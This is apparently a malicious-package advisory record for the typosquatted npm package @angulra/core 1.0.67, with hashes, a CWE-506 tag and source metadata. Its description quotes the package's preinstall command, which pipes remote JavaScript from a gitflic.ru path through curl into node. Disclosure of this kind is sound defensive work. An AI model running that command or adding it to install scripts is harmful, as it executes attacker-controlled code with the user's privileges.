-= Per source details. Do not edit below this line.=-
The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at npm install time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name @angulra/core resembles Angular ecosystem names while the package description (Core Libs) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running npm install on this package executes arbitrary remote code with the installing user's privileges.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020910",
"import_time": "2026-10-04T23:40:41.043648329Z",
"modified_time": "2026-10-04T23:18:17Z",
"sha256": "7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34",
"source": "amazon-inspector",
"versions": [
"1.0.67"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "d3f10c7b4cde21b539f30b278e1990ede4854a6d01d9b6a5c2d00792ba1a792d",
"tlsh": "6e117b20dd8c5ea316c209f928bdc8419565081b4d94bc9cf3ea040d8f5eaaf717a55d"
}
],
"package_integrity": [
{
"filename": "core-1.0.67.tgz",
"hashes": {
"sha1": "64ddfbbf45b2e088922cd2895774fa28e602c670",
"sha512_sri": "sha512-sJjjB2S5i7NvgT0Nsvg7IDWQGWzhiMn50XdDCxTLD53avqIiW3sieE3XXyZY6c5wwu0hiG42VL5VVMtVUyhk5w=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/core/MAL-2026-17496.json"